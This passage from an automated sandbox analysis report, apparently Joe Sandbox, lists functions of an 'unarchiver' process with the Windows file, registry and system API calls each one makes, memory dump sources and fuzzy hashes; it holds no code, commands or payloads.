Opcode Fuzzy Hash: 535e5de7ba0c59d469d5f5275e6bc505859aef3ec40ace2581ecb9dedad1a686
Instruction Fuzzy Hash: 6A219176504744AFD721CF11DC84FA2BBFCEF05710F08859AE985CB252D364E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B276 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00C3B2F3

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f028fdb7d7cde1f56e40891591d5ab4554311be3b168c4199dbe439662767f23
Instruction ID: 23d63374c3021fb6aabf93d68ca253c3f9b0b5799481ab5008aed102840139cc
Opcode Fuzzy Hash: f028fdb7d7cde1f56e40891591d5ab4554311be3b168c4199dbe439662767f23
Instruction Fuzzy Hash: 0821D672500204AFEB219F55DC44FABFBECEF04314F04896AFA45DB651D735E9088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A50F Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 00C3A5B6

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 9e3da839ba4532dda6faa8d9695819b7a04d6d7018d920af99019a83b87ce94e
Instruction ID: 62bb772dfa94a548b3f7b485becb1c4a747ccebecdb05fdc93a6df1a8a9f75ca
Opcode Fuzzy Hash: 9e3da839ba4532dda6faa8d9695819b7a04d6d7018d920af99019a83b87ce94e
Instruction Fuzzy Hash: 942183B150D3806FD7138B25CC51B62BFB8EF87614F0A81DBE884DB593D624A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AD2A Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00C3ADA7

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1d47bb1fcc70a888ebfe62a550a8c769e00b15f5ae0f4018cb8a17b88c0ef97c
Instruction ID: b654781c15703c99028a0962ec8fb8a9df8bdaebfb449c6549428e2030231b31
Opcode Fuzzy Hash: 1d47bb1fcc70a888ebfe62a550a8c769e00b15f5ae0f4018cb8a17b88c0ef97c
Instruction Fuzzy Hash: 2E21F472500204AFEB218F51DC44FABFBECEF08324F04885AEA45DBA51D331E4188BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A850 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A8DE

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d6f92de6ff10b80cada168ae0133c0b92d53d6ec19f8a172eddbd62c8e3b7493
Instruction ID: cd7d138ec5047e64c97a8a0578a64a5d03f1ce7ad629ef84e596a688dd39c8c7
Opcode Fuzzy Hash: d6f92de6ff10b80cada168ae0133c0b92d53d6ec19f8a172eddbd62c8e3b7493
Instruction Fuzzy Hash: 7221D6714093806FEB228F50DC44FA2BFB8EF46724F0884DAE9849F553C325A919C771

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A933 Relevance: 1.6, APIs: 1, Instructions: 77
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A9C1

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5964664f5321b036d547ad4566cda2d1985eb53b491794a42b1bd7b6206d8415
Instruction ID: b9ae20dd5b68eca12d46a3875e264e25a602dd0dff2b437ba4b81e82d7022367
Opcode Fuzzy Hash: 5964664f5321b036d547ad4566cda2d1985eb53b491794a42b1bd7b6206d8415
Instruction Fuzzy Hash: B1218171409380AFDB22CF55DC44F96BFB8EF46314F08859AE9849F252D365A508CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A5FE Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00C3A67D

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6ff3a47c25d2ef5576d318172593e9c00a57b831791f905646ca35d78074a4ef
Instruction ID: 4263ec1f11949f2014f60366339a6a66730dd731d2fc98565c7188fbeb778fd2
Opcode Fuzzy Hash: 6ff3a47c25d2ef5576d318172593e9c00a57b831791f905646ca35d78074a4ef
Instruction Fuzzy Hash: 4821A171500200AFEB21DF65CD45F66FBE8EF04314F08855DE9858B652D375E918CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A78F Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A815

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: cca3b1e1484d26001bdf7e18fb1f624b686cf6f38fc395db0cd59c380e4cfc0d
Instruction ID: 23552a5488fa18e0cd719b6baee2da6a9bdcd7eb7cc34b945243d6b2b4dbaf82
Opcode Fuzzy Hash: cca3b1e1484d26001bdf7e18fb1f624b686cf6f38fc395db0cd59c380e4cfc0d
Instruction Fuzzy Hash: EA21D5B54093806FE7128B51DC40BA2BFB8EF46314F0880DAE9848B293D364A909C772

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A6D4 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00C3A748

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8617a9de02d86f996b29a5021c188f6700d3e4c523f4d211958acdc712c03f20
Instruction ID: ae17d41e7eabf5af9c4d8dc9f265b0bd370bb26fe87c8d9505e807b42143f327
Opcode Fuzzy Hash: 8617a9de02d86f996b29a5021c188f6700d3e4c523f4d211958acdc712c03f20
Instruction Fuzzy Hash: 9121C2B550A7C05FDB138B25DC95692BFB8EF07320F0984DADC858B6A3D2649918C762

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AA0B Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00C3AA8B

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 879cca1851d6b73446a475d47a702bf17290740141a35a305197de62dcbc3774
Instruction ID: 120119616e8b489388298943fdc08e5fa8e54f4f5aafaf0c5d408c7f5b0de679
Opcode Fuzzy Hash: 879cca1851d6b73446a475d47a702bf17290740141a35a305197de62dcbc3774
Instruction Fuzzy Hash: FE2180725093C05FDB12CB69DC55B92BFE8AF06314F0D84EAE884CB153D325D909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A392 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A40C

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: be476758f68de6f9265d7b2a815eb8bc1c5461d4f8a70d5138916d6c24a532ef
Instruction ID: c5c41869415258d43bf3bb717354ad74bca2bdc4251a0c58952e17635cceaaf2
Opcode Fuzzy Hash: be476758f68de6f9265d7b2a815eb8bc1c5461d4f8a70d5138916d6c24a532ef
Instruction Fuzzy Hash: F321AF76600604AFEB20CF55DC84FA6F7ECEF04714F08C55AE985CB692D364E919CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A962 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A9C1

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e8af9df64b11a27ac116767d0209001c10f3e1dbd3828d95cc76ae55161c4c3f
Instruction ID: fc89b865c74f4a21d2ce0c1b028de5211fbb2848562a34be4f56dab0f16f74c7
Opcode Fuzzy Hash: e8af9df64b11a27ac116767d0209001c10f3e1dbd3828d95cc76ae55161c4c3f
Instruction Fuzzy Hash: 97110172400300AFEB21CF51DC40FAAFBE8EF04324F04C55AE9859B642C335A818CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A882 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A8DE

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7f50708110b61940d03f5392b448cba22af5be2315914d0b0a7db0f8120d2255
Instruction ID: 8988673705bb8c7eb5d81ae933557117c7253a7b68d24cf0b61d0a5695355ddd
Opcode Fuzzy Hash: 7f50708110b61940d03f5392b448cba22af5be2315914d0b0a7db0f8120d2255
Instruction Fuzzy Hash: 5311C171500204AFEB21CF55DC44BA6FBE8EF44724F14C45AE9859B641D375A918CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A2AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00C3A30C

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e582344d035aeedfd5d75f6201a3fe8cfb3db2f8db5df0301c75f6c7afe7316a
Instruction ID: 34c2981c4cae231d338bc2ee37b47e696565f69a36bd4a4495f2c26b755f6ead
Opcode Fuzzy Hash: e582344d035aeedfd5d75f6201a3fe8cfb3db2f8db5df0301c75f6c7afe7316a
Instruction Fuzzy Hash: C911A07540D3C09FDB228B25DC54A52BFB4EF07320F0980DBED848F263D269A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A7C2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A815

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b6e3a8430f1c17eeb6d57b4b95ed0192283c00547610dec2b50fcd1b960c7feb
Instruction ID: b193a4ab9efacf1a40d11b1595131261bfc4c071f330dbbb4610b92f6e1b1455
Opcode Fuzzy Hash: b6e3a8430f1c17eeb6d57b4b95ed0192283c00547610dec2b50fcd1b960c7feb
Instruction Fuzzy Hash: 2901D271504204AEEB20CB06DC84BA6FBE8DF44724F14C096ED459B782D378E909CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AA46 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00C3AA8B

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 1c179b79d8d80d9393e93090484520412333294a0380cc873e1f657b9bec29d9
Instruction ID: aaf004398931f0e7af544be7fecffa0cabe7f043a9061fcc9050d6e63f6c5bc3
Opcode Fuzzy Hash: 1c179b79d8d80d9393e93090484520412333294a0380cc873e1f657b9bec29d9
Instruction Fuzzy Hash: 7A11A1726042409FEB10CF59D984B66FBE8EF04720F08C4AAED49CB652E335E914DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AF8B Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 00C3AFE4

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 54be70baba166375629ffd113ec447c17072aa4f321984a7814995ebc73215f5
Instruction ID: 838fc3b9a9e13f451abeb4a35b59d0925b23357e0921109999c32be2dbae1ba7
Opcode Fuzzy Hash: 54be70baba166375629ffd113ec447c17072aa4f321984a7814995ebc73215f5
Instruction Fuzzy Hash: D111A0B55093C09FDB128B25DC45B52BFF4EF06220F0984DAED898B263D365AC08DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B1B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 00C3B208

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d188e0758ba76eb1e3ac82277d72a058edcda5f35cd84aaffea7e54721f3bbbe
Instruction ID: 00ef1171182b227b2eb2845d0eb2cfa46b26fae352aee6b3e0ca5f106006680e
Opcode Fuzzy Hash: d188e0758ba76eb1e3ac82277d72a058edcda5f35cd84aaffea7e54721f3bbbe
Instruction Fuzzy Hash: 5B117C714093C0AFDB128F55DC84B56BFB4EF46220F0884EAED889F253D275A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C3ABE6 Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00C3AC36

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: dc1e9c61e18e250bbefd105b73f97288ef530b45b57c7e10c0e4b7ef28590d46
Instruction ID: c8977cb606c5a539f00997917d39d2c8c29ed42100d9d2c479df5f847941e208
Opcode Fuzzy Hash: dc1e9c61e18e250bbefd105b73f97288ef530b45b57c7e10c0e4b7ef28590d46
Instruction Fuzzy Hash: 10015E71600200ABD650DF16DC45B66FBE8FB88A20F14855AED089BB41D731B915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00C3A1C2

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: b6548a6ae83305f963a7bf1f1d9c24a4231a6eec81b163abc8e1d794522d18f6
Instruction ID: 44696a6d7361fe7ce432ec0068e66514ac216ce0d11679c6206a2bb7db7520fb
Opcode Fuzzy Hash: b6548a6ae83305f963a7bf1f1d9c24a4231a6eec81b163abc8e1d794522d18f6
Instruction Fuzzy Hash: 8B017171600200ABD750DF16DC45B76FBE8FB88A20F14855AED089BB41D735F915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A566 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 00C3A5B6

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: a98910de58a18cb0237cf50f866bed52095b3f09df6c039bc861126f0f03de0d
Instruction ID: 979cb7f4591e6cb208b604deeb48b2b2da3bbaff6ef08a98b3d059d13ee1a18e
Opcode Fuzzy Hash: a98910de58a18cb0237cf50f866bed52095b3f09df6c039bc861126f0f03de0d
Instruction Fuzzy Hash: 2501AD71600200ABD650DF1ACC86F76FBE8FB88A20F14815AEC089BB41D731F915CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A716 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00C3A748

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 15bbbbaa8cbd1746a2b975403b06bbce254e03bb8a142bfac000e3f42b4efc1d
Instruction ID: 145051defc631c1b241c10a574fd88660fcdb025a0342de1ab69c757e8e46222
Opcode Fuzzy Hash: 15bbbbaa8cbd1746a2b975403b06bbce254e03bb8a142bfac000e3f42b4efc1d
Instruction Fuzzy Hash: A401F2719042408FDB10CF55D9857A6FBE8EF01320F18C4AADC498F752D379E818CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AFB2 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 00C3AFE4

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 360514816b7cb5b1b55e16434b6d6d0011265f3ce6a2a35e302ec3ba17b4a152
Instruction ID: 7e5e90718da8afb57f34e8147843e5037abc1c282cfd8550bb7ce072eaf62a10
Opcode Fuzzy Hash: 360514816b7cb5b1b55e16434b6d6d0011265f3ce6a2a35e302ec3ba17b4a152
Instruction Fuzzy Hash: 060128B55002449FDB148F16D884762FBE4EF04324F08C0AADD4A8F752D379EC48DEA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00C3A30C

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 4bb3d73235e6aaf61c88f853b5e9126b1ba82d5f748c2c657ef7b534d1ecac54
Instruction ID: c0797485c917610d16f857936f7b522965ab20616cc5a84b69550fce8f237318
Opcode Fuzzy Hash: 4bb3d73235e6aaf61c88f853b5e9126b1ba82d5f748c2c657ef7b534d1ecac54
Instruction Fuzzy Hash: EEF0AF755146449FDB60DF06D884761FBE0EF04724F08C09ADD894F762D379E918CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 04B10C99 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

e]-l^, xrefs: 04B10D6E, 04B10D73

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID: e]-l^
API String ID: 0-1375761903
Opcode ID: dc85371a336658631f661cf2ccd43f93b1fe8bd111dfd38f982a94b993298b0d
Instruction ID: 18d0646737450790df101c111eed4501323ef7dbec96a53c6a71ca9a6d7d7a4f
Opcode Fuzzy Hash: dc85371a336658631f661cf2ccd43f93b1fe8bd111dfd38f982a94b993298b0d
Instruction Fuzzy Hash: 0E2126307006248FCB15FB3588807AE7BD29FC9218B44446CD585DBB91EF36ED0A97A1

Uniqueness

Uniqueness Score: -1.00%

Function 04B10CA8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

e]-l^, xrefs: 04B10D6E, 04B10D73

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID: e]-l^
API String ID: 0-1375761903
Opcode ID: 48e7379b9265c96daf7afacf966122dc46890d21932cb6ad60d5db56b73e0942
Instruction ID: 8794b519d7d4988cf933f62db8b5b5eeb9c6143cf2564f1748a4d09b68f20b11
Opcode Fuzzy Hash: 48e7379b9265c96daf7afacf966122dc46890d21932cb6ad60d5db56b73e0942
Instruction Fuzzy Hash: D521E7307006148BCB14FB3588816AFB7D69FC5208B44842CD546DBB55EF75E90A97A1

Uniqueness

Uniqueness Score: -1.00%

Function 04B102C0 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e2cc973ac094e68c25b554c05e2ef4916daaf2286634e3c678db026fa3bac1
Instruction ID: ec0db4ca70f7257261829230f2eaadf78442f5c076d26683aac8e2fb6fad864f
Opcode Fuzzy Hash: 53e2cc973ac094e68c25b554c05e2ef4916daaf2286634e3c678db026fa3bac1
Instruction Fuzzy Hash: F6B12A3A706210CFC758EB74E858B5E7BB2FF89350B508568D9469F768DB30AC85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B10BA0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d746621884429e458c4137c025274532225653cc4efd58d9fe6b0500592dcb40
Instruction ID: ae6f382ba064e032dcc67163a0eb024f2dbd22e9997d5955b9674cb16449c23c
Opcode Fuzzy Hash: d746621884429e458c4137c025274532225653cc4efd58d9fe6b0500592dcb40
Instruction Fuzzy Hash: 95114F32B10218AF8B14ABB4DC449DF77F6ABC8214B054575E605EB764EB31AC498B90

Uniqueness

Uniqueness Score: -1.00%

Function 00DF0808 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447052682.0000000000DF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3e458f30caaed661c465666a2fd7de6eeea3e0dcfdbce20c1da4479dc854922
Instruction ID: 58b72c7980bfbdc916db6a19d119bcea270afb8b0b914acc0a241f791853ed7f
Opcode Fuzzy Hash: b3e458f30caaed661c465666a2fd7de6eeea3e0dcfdbce20c1da4479dc854922
Instruction Fuzzy Hash: 6A01D4B240D3546FD701CB45AC45C62BFF8EF86520F09C4AEFD488B602D265AD18CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00DF05E0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447052682.0000000000DF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21fe25ceb03ed8e8a34c7ed229df3b198d786aa220f0f1123bd30d16e53843f7
Instruction ID: bb55e5c470d96377fa7fef47879cf878c788a22c3df23b28c72a8ca560e15bbe
Opcode Fuzzy Hash: 21fe25ceb03ed8e8a34c7ed229df3b198d786aa220f0f1123bd30d16e53843f7
Instruction Fuzzy Hash: 36F0F9B65093846FD7118B06EC40873FFE8EB86630709C49FEC498B712D225AC08CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DF082E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447052682.0000000000DF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9033a20e864935391ea286dec0e01dd6fe8b7e5103d9f6fe898dc5242b8d55be
Instruction ID: 9ed2590082a1d2b12c2856ec8b434ce5f98fcefd10b908530a9af68a87d2459d
Opcode Fuzzy Hash: 9033a20e864935391ea286dec0e01dd6fe8b7e5103d9f6fe898dc5242b8d55be
Instruction Fuzzy Hash: BBF08CB2909204ABE200DF49ED45866F7ECEF84521F18C52EED088B701E376A9158AE2

Uniqueness

Uniqueness Score: -1.00%

Function 04B10C50 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e9e0f47e9e54fb6f8c48eef58826af43c532d0108964a2f3d06df85c92fed1
Instruction ID: fdf8d74249020e33dbbf7e7f57c2b1e77212e84a6276e3b414d7f2320acb9d1d
